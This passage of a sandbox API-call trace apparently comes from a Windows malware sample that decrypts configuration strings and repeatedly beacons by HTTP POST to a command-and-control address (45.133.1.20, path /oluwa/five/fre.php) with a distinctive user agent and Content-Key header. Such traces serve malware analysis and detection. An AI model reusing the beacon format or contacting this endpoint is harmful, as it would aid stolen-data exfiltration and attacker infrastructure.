szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0176.191] GetProcessHeap () returned 0x6a0000 [0176.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bf3a0 [0176.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.192] CryptImportKey (in: hProv=0x6beca0, pbData=0x6bf3a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0176.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.194] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.195] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.195] GetProcessHeap () returned 0x6a0000 [0176.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf3a0 | out: hHeap=0x6a0000) returned 1 [0176.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.197] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0176.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.198] CryptDestroyKey (hKey=0x6ad060) returned 1 [0176.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.208] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0176.208] GetProcessHeap () returned 0x6a0000 [0176.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.209] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.211] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.215] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.216] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.216] GetProcessHeap () returned 0x6a0000 [0176.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0176.217] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.217] GetProcessHeap () returned 0x6a0000 [0176.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0176.218] GetProcessHeap () returned 0x6a0000 [0176.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0176.218] GetProcessHeap () returned 0x6a0000 [0176.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0176.218] GetProcessHeap () returned 0x6a0000 [0176.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0176.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.220] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.230] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0176.240] GetProcessHeap () returned 0x6a0000 [0176.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0176.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.241] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0176.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.242] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.249] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.249] GetProcessHeap () returned 0x6a0000 [0176.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0176.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.251] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0176.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.252] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0176.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.257] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0176.258] GetProcessHeap () returned 0x6a0000 [0176.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0176.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.260] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0176.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.261] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0176.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.263] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0176.263] GetProcessHeap () returned 0x6a0000 [0176.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0176.263] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf4e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0176.263] GetProcessHeap () returned 0x6a0000 [0176.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0176.263] socket (af=2, type=1, protocol=6) returned 0x39c [0176.263] connect (s=0x39c, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0176.339] FreeAddrInfoW (pAddrInfo=0x6bf4e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0176.339] GetProcessHeap () returned 0x6a0000 [0176.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0176.340] GetProcessHeap () returned 0x6a0000 [0176.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0176.342] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0176.343] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0176.343] GetProcessHeap () returned 0x6a0000 [0176.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0176.343] GetProcessHeap () returned 0x6a0000 [0176.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0176.344] GetProcessHeap () returned 0x6a0000 [0176.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0176.344] GetProcessHeap () returned 0x6a0000 [0176.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0176.344] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0176.345] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0176.345] GetProcessHeap () returned 0x6a0000 [0176.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0176.345] GetProcessHeap () returned 0x6a0000 [0176.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0176.346] send (s=0x39c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0176.347] send (s=0x39c, buf=0x6bb998*, len=159, flags=0) returned 159 [0176.347] GetProcessHeap () returned 0x6a0000 [0176.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0176.347] recv (in: s=0x39c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0176.417] GetProcessHeap () returned 0x6a0000 [0176.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0176.419] GetProcessHeap () returned 0x6a0000 [0176.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0176.420] GetProcessHeap () returned 0x6a0000 [0176.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0176.420] GetProcessHeap () returned 0x6a0000 [0176.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0176.421] closesocket (s=0x39c) returned 0 [0176.422] GetProcessHeap () returned 0x6a0000 [0176.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0176.422] GetProcessHeap () returned 0x6a0000 [0176.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0176.422] GetProcessHeap () returned 0x6a0000 [0176.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0176.423] GetProcessHeap () returned 0x6a0000 [0176.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0176.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9b0) returned 0x39c [0176.426] Sleep (dwMilliseconds=0xea60) [0176.428] GetProcessHeap () returned 0x6a0000 [0176.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0176.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.429] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0176.449] GetProcessHeap () returned 0x6a0000 [0176.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0176.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.450] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0176.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.452] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.453] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.453] GetProcessHeap () returned 0x6a0000 [0176.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0176.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.457] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0176.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.574] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0176.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.576] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0176.576] GetProcessHeap () returned 0x6a0000 [0176.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.577] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.578] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.579] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.580] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.580] GetProcessHeap () returned 0x6a0000 [0176.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0176.580] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.580] GetProcessHeap () returned 0x6a0000 [0176.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0176.581] GetProcessHeap () returned 0x6a0000 [0176.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0176.581] GetProcessHeap () returned 0x6a0000 [0176.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0176.581] GetProcessHeap () returned 0x6a0000 [0176.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0176.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.583] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.592] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0176.604] GetProcessHeap () returned 0x6a0000 [0176.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0176.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.605] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0176.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.606] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.607] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.607] GetProcessHeap () returned 0x6a0000 [0176.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0176.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.609] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0176.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.610] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0176.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.612] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0176.612] GetProcessHeap () returned 0x6a0000 [0176.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.613] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0176.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.615] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0176.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.616] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0176.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.617] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0176.617] GetProcessHeap () returned 0x6a0000 [0176.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0176.617] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf850*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0176.617] GetProcessHeap () returned 0x6a0000 [0176.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0176.617] socket (af=2, type=1, protocol=6) returned 0x3a0 [0176.618] connect (s=0x3a0, name=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0176.656] FreeAddrInfoW (pAddrInfo=0x6bf850*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0176.656] GetProcessHeap () returned 0x6a0000 [0176.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0176.656] GetProcessHeap () returned 0x6a0000 [0176.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0176.657] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0176.658] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0176.658] GetProcessHeap () returned 0x6a0000 [0176.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0176.659] GetProcessHeap () returned 0x6a0000 [0176.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0176.659] GetProcessHeap () returned 0x6a0000 [0176.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0176.659] GetProcessHeap () returned 0x6a0000 [0176.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0176.661] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0176.661] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0176.662] GetProcessHeap () returned 0x6a0000 [0176.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0176.663] GetProcessHeap () returned 0x6a0000 [0176.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0176.663] send (s=0x3a0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0176.664] send (s=0x3a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0176.664] GetProcessHeap () returned 0x6a0000 [0176.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0176.664] recv (in: s=0x3a0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0176.731] GetProcessHeap () returned 0x6a0000 [0176.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0176.732] GetProcessHeap () returned 0x6a0000 [0176.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0176.733] GetProcessHeap () returned 0x6a0000 [0176.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0176.733] GetProcessHeap () returned 0x6a0000 [0176.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0176.734] closesocket (s=0x3a0) returned 0 [0176.734] GetProcessHeap () returned 0x6a0000 [0176.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0176.734] GetProcessHeap () returned 0x6a0000 [0176.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0176.735] GetProcessHeap () returned 0x6a0000 [0176.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0176.735] GetProcessHeap () returned 0x6a0000 [0176.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0176.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xea0) returned 0x3a0 [0176.738] Sleep (dwMilliseconds=0xea60) [0176.751] GetProcessHeap () returned 0x6a0000 [0176.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0176.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.802] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0176.866] GetProcessHeap () returned 0x6a0000 [0176.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6788 [0176.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.877] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b6788, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0176.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.879] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.880] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, 